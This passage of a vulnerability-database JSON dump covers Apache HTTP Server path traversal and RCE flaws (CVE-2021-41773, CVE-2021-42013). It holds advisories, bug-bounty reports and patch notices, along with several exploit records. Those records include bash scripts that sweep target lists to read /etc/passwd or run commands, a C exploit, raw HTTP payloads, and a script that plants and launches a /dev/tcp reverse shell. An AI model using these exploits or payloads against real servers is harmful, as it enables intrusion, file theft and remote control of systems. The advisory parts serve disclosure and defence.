xmlns:p=\"http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem\">\n <p:Script>#{Rex::Text.encode_base64(cmd)}</p:Script>\n <p:Arguments/>\n <p:timeout>0</p:timeout>\n <p:b64encoded>true</p:b64encoded>\n </p:ExecuteScript_INPUT>\n </s:Body>\n </s:Envelope>\n ENVELOPE\n )\n end\nend\n", "sourceHref": "https://0day.today/exploit/36967", "cvss": {"score": 7.5, "vector": 
"AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-03T01:52:37", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-13T00:00:00", "type": "zdt", "title": "Apache HTTP Server 2.4.50 - Path Traversal & Remote Code Execution Vulnerabilities", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2021-10-13T00:00:00", "id": "1337DAY-ID-36897", "href": "https://0day.today/exploit/description/36897", "sourceData": "# Exploit: Apache HTTP Server 2.4.50 - Path Traversal & Remote Code Execution (RCE)\n# Exploit Author: Lucas Souza https://lsass.io\n# Vendor Homepage: https://apache.org/\n# Version: 2.4.50\n# Tested on: 2.4.50\n# CVE : CVE-2021-42013\n# Credits: Ash Daulton and the cPanel Security Team\n\n#!/bin/bash\n\n# Both the target list and the path are required; either one missing prints usage.\nif [[ $1 == '' ]] || [[ $2 == '' ]]; then\necho Set [TARGET-LIST.TXT] [PATH] [COMMAND]\necho ./PoC.sh targets.txt /etc/passwd\necho ./PoC.sh targets.txt /bin/sh id\n\nexit\nfi\nfor host in $(cat $1); do\necho $host\ncurl -s --path-as-is -d \"echo Content-Type: text/plain; echo; $3\" 
\"$host/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/$2\"; done\n\n# PoC.sh targets.txt /etc/passwd\n# PoC.sh targets.txt /bin/sh whoami\n", "sourceHref": "https://0day.today/exploit/36897", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-07T08:00:41", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-07T00:00:00", "type": "zdt", "title": "Apache 2.4.50 Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2022-06-07T00:00:00", "id": "1337DAY-ID-37777", "href": "https://0day.today/exploit/description/37777", "sourceData": "#include <stdio.h>\n#include <stdlib.h>\n#include <stdbool.h>\n#include <string.h>\n#include <curl/curl.h>\n\n/* Apache 2.4.50 exploit (CVE-2021-42013)\n * Author: Vilius Povilaika\n * Website: www.povilaika.com */\n\n// compile: $ gcc cve-2021-42013.c -lcurl -o cve-2021-42013\n\nint usage(char* prog)\n{\n printf(\"Usage: %s <host> <exec>\\n\", prog);\n printf(\" - %s https://127.0.0.1 \\\"uname 
-a\\\"\\n\", prog);\n return 0;\n}\n\nbool error(const char* reason)\n{\n printf(\"[ERR] Critical error - %s\\n\", reason);\n return false;\n}\n\nstruct callback_result {\n char* data;\n size_t size;\n};\n\nstatic size_t callback(void* pointer, size_t size, size_t nmemb, void* data)\n{\n struct callback_result *memory = (struct callback_result *)data;\n char* ptr = realloc(memory->data, memory->size+nmemb+1);\n if (ptr == NULL)\n return 0; /* tell libcurl the write failed instead of dereferencing NULL */\n memory->data = ptr;\n memcpy(&(memory->data[memory->size]), pointer, nmemb);\n memory->size += nmemb;\n memory->data[memory->size] = 0;\n return nmemb;\n}\n\nbool exploit(void* result, char* host, char* exec)\n{\n CURL *curl = curl_easy_init();\n char url[256];\n /* bounded formatting: a long <host> must not overflow the fixed buffers */\n snprintf(url, sizeof url, \"%s/cgi-bin/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/bin/sh\", host);\n curl_easy_setopt(curl, CURLOPT_URL, url);\n char payload[256];\n snprintf(payload, sizeof payload, \"echo Content-Type: text/plain; echo; %s\", exec);\n curl_easy_setopt(curl, CURLOPT_POSTFIELDS, payload);\n curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, callback);\n curl_easy_setopt(curl, CURLOPT_WRITEDATA, result);\n int res = curl_easy_perform(curl);\n if (res != CURLE_OK)\n return error(curl_easy_strerror(res));\n curl_easy_cleanup(curl);\n return true;\n}\n\nint main(int argc, char* argv[])\n{\n if (argc != 3)\n return usage(argv[0]);\n struct callback_result result = {0};\n bool res = exploit(&result, argv[1], argv[2]);\n if (res)\n printf(\"[+] Exploit finished successfully, check output\\n\");\n else\n printf(\"[-] Exploit failed, check output\\n\");\n printf(\" \\n%s\\n\", result.data);\n return 0;\n}\n", "sourceHref": "https://0day.today/exploit/37777", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-16T05:38:55", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": 
"HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-25T00:00:00", "type": "zdt", "title": "Apache HTTP Server 2.4.50 - Remote Code Execution Exploit (2)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2021-10-25T00:00:00", "id": "1337DAY-ID-36937", "href": "https://0day.today/exploit/description/36937", "sourceData": "# Exploit: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (2)\n# Credits: Ash Daulton & cPanel Security Team\n# Exploit Author: TheLastVvV.com\n# Vendor Homepage: https://apache.org/\n# Version: Apache 2.4.50 with CGI enabled\n# Tested on : Debian 5.10.28\n# CVE : CVE-2021-42013\n\n#!/bin/bash\n\necho 'PoC CVE-2021-42013 reverse shell Apache 2.4.50 with CGI'\n# all three arguments (URL, LHOST, LPORT) are needed to build the reverse shell\nif [ $# -ne 3 ]\nthen\necho \"try: ./$0 http://ip:port LHOST LPORT\"\nexit 1\nfi\ncurl \"$1/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh\" -d \"echo Content-Type: text/plain; echo; echo '/bin/sh -i >& /dev/tcp/$2/$3 0>&1' > /tmp/revoshell.sh\" && curl \"$1/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh\" -d \"echo Content-Type: text/plain; echo; bash /tmp/revoshell.sh\"\n\n#usage chmod +x CVE-2021-42013.sh\n#./CVE-2021-42013_reverseshell.sh http://ip:port/ LHOST LPORT\n", "sourceHref": "https://0day.today/exploit/36937", "cvss": {"score": 7.5, "vector": 
"AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-04T15:49:47", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-10-06T00:00:00", "type": "zdt", "title": "Apache HTTP Server 2.4.49 - Path Traversal Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-06T00:00:00", "id": "1337DAY-ID-36854", "href": "https://0day.today/exploit/description/36854", "sourceData": "# Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal\n# Exploit Author: Lucas Souza https://lsass.io\n# Vendor Homepage: https://apache.org/\n# Version: 2.4.49\n# Tested on: 2.4.49\n# CVE : CVE-2021-41773\n# Credits: Ash Daulton and the cPanel Security Team\n\n#!/bin/bash\n\n# Both the target list and the path are required; either one missing prints usage.\nif [[ $1 == '' ]] || [[ $2 == '' ]]; then\necho Set [TARGET-LIST.TXT] [PATH]\necho ./PoC.sh targets.txt /etc/passwd\nexit\nfi\nfor host in $(cat $1); do\ncurl --silent --path-as-is --insecure \"$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2\"; done\n", "sourceHref": "https://0day.today/exploit/36854", "cvss": {"score": 4.3, "vector": 
"AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "httpd": [{"lastseen": "2022-03-17T19:28:46", "description": "It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. \n\nIf files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution.\n\nThis issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-06T00:00:00", "type": "httpd", "title": "Apache Httpd < 2.4.51 : Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-41773)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-07T00:00:00", "id": "HTTPD:E1C40920F9DFC60284EEE7539DA30483", "href": "https://httpd.apache.org/security_report.html", 
"cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T17:50:44", "description": "A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives.\n\nIf files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution.\n\nThis issue is known to be exploited in the wild.\n\nThis issue only affects Apache 2.4.49 and not earlier versions.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-09-29T00:00:00", "type": "httpd", "title": "Apache Httpd < 2.4.50 : Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-04T00:00:00", "id": "HTTPD:2C849FE5B165E832EE21ADAECFA9521C", "href": "https://httpd.apache.org/security_report.html", "cvss": 
{"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "hackerone": [{"lastseen": "2023-03-22T23:27:27", "bounty": 1000.0, "description": "It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives.\n\nThis issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions.\n\n-\nMy friend Juan Escobar @itsecurityco and I (Fernando Munoz) reported this internally to the Apache HTTPd project and worked with them to test the new patch before the new version was released.\n\n## Impact\n\nIf files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-14T23:54:06", "type": "hackerone", "title": "Internet Bug Bounty: Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-41773) (CVE-2021-42013)", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": 
"NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-11-19T00:14:57", "id": "H1:1400238", "href": "https://hackerone.com/reports/1400238", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-22T23:27:35", "bounty": 4000.0, "description": "A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013.\n\n## Impact\n\nThe attacker may be able read the contents of unexpected files and expose sensitive data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. 
For example, by reading a password file, the attacker could conduct brute force password guessing attacks in order to break into an account on the system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-08T21:47:54", "type": "hackerone", "title": "Internet Bug Bounty: Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-11-09T20:19:52", "id": "H1:1394916", "href": "https://hackerone.com/reports/1394916", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-22T23:27:27", "bounty": 1000.0, "description": "Hello Apache team,\n\n@fms and myself were able to bypass the latest patch for CVE 2021-41773 in the Apache 2.4.50.\n\nThese are the payloads:\n\n1) %%32%65%%32%65\n2) .%%32%65\n3) .%%32e\n4) .%2%65\n\nPoC Path Traversal\n\nGET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1\nHost: localhost:83\nsec-ch-ua: \";Not A Brand\";v=\"99\", \"Chromium\";v=\"94\"\nsec-ch-ua-mobile: 
?0\nsec-ch-ua-platform: \"Windows\"\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nSec-Fetch-Site: none\nSec-Fetch-Mode: navigate\nSec-Fetch-User: ?1\nSec-Fetch-Dest: document\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nConnection: close\n\nPoC RCE\n\nPOST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1\nHost: 192.168.88.201\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9,es;q=0.8\nIf-None-Match: \"2aa6-5cda88e8a6005-gzip\"\nIf-Modified-Since: Wed, 06 Oct 2021 05:38:33 GMT\nConnection: close\nContent-Length: 60\n\necho Content-Type: text/plain; echo; id; uname;apache2ctl -M\n\n## Impact\n\nAn attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives.\n\nIf files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. 
If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-18T21:56:01", "type": "hackerone", "title": "Internet Bug Bounty: Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.50", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2021-11-19T23:45:37", "id": "H1:1404731", "href": "https://hackerone.com/reports/1404731", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "photon": [{"lastseen": "2022-05-12T18:54:18", "description": "Updates of ['httpd'] packages of Photon OS have been released.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": 
"2021-10-19T00:00:00", "type": "photon", "title": "Critical Photon OS Security Update - PHSA-2021-0118", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41524", "CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-19T00:00:00", "id": "PHSA-2021-0118", "href": "https://github.com/vmware/photon/wiki/Security-Update-4.0-118", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-10T03:16:20", "description": "Updates of ['httpd'] packages of Photon OS have been released.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-20T00:00:00", "type": "photon", "title": "Critical Photon OS Security Update - PHSA-2021-4.0-0118", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": 
"NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41524", "CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-20T00:00:00", "id": "PHSA-2021-4.0-0118", "href": "https://github.com/vmware/photon/wiki/Security-Update-4.0-118", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "malwarebytes": [{"lastseen": "2021-10-13T10:35:39", "description": "The Apache HTTP Server 2.4.49 is vulnerable to a flaw that allows attackers to use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by \"require all denied\" these requests can succeed. This issue is known to be exploited in the wild.\n\n### The vulnerability\n\nThe Apache HTTP Server Project started out as an effort to develop and maintain an open-source HTTP server for modern operating systems, including UNIX and Windows. It provides a secure, efficient, and extensible server that provides HTTP services in sync with the current HTTP standards.\n\nThe flaw (listed as [CVE-2021-41773](<https://nvd.nist.gov/vuln/detail/CVE-2021-41773>)) was introduced by a change made to path normalization in Apache HTTP Server 2.4.49. So, earlier versions are not vulnerable, nor are servers that are configured to \"require all denied\". \n\nUnfortunately, \u201crequire all denied\u201d is off in the default configuration. This is the setting that typically shows an error that looks like this:\n\n_ \"Forbidden. You don't have permission to access {path}.\"_\n\n### Path traversal attack\n\nPath traversal attacks are done by sending requests to access backend or sensitive server directories that should be out of reach for unauthorized users. 
While normally these requests are blocked, the vulnerability allows an attacker to bypass the filters by using encoded characters (ASCII) for the URLs.\n\nUsing this method an attacker could gain access to files like cgi scripts that are active on the server, which could potentially reveal configuration details that could be used in further attacks.\n\n### Impact\n\nThe Apache HTTP Server Project was launched in 1995, and it's been the most popular web server on the Internet since April 1996. In August 2021 there were some 49 million active sites running on Apache server. Obviously we do not know which server every domain is using, but of the sites where we can identify the web server, Apache is used by 30.9%.\n\nA [Shodan search by Bleeping Computer](<https://www.bleepstatic.com/images/news/u/1220909/Code%20and%20Details/apache_number.jpg> \"\" ) showed that there are over a hundred thousand Apache HTTP Server 2.4.49 deployments online, many of which could be vulnerable to exploitation.\n\nSecurity researchers have warned that admins should patch immediately.\n\n> If you use Apache HTTP Server 2.4.49 (only that version), you should update to 2.4.50 now due to CVE-2021-41773, a nasty 0-day path traversal vulnerability <https://t.co/2QiV4h77B4>\n> \n> -- Mark J Cox (@iamamoose) [October 5, 2021](<https://twitter.com/iamamoose/status/1445304838963830784?ref_src=twsrc%5Etfw>)\n\n### Another vulnerability\n\nThere's a second vulnerability tackled by this patch\u2014[CVE-2021-41524](<https://nvd.nist.gov/vuln/detail/CVE-2021-41524>)\u2014a null pointer dereference detected during HTTP/2 request processing. This flaw allows an attacker to perform a denial of service (DoS) attack on the server. This requires a specially crafted request.\n\nThis flaw also only exists in Apache Server version 2.4.49, but is different to the first vulnerability in that, as far as we know, it is not under active exploitation. 
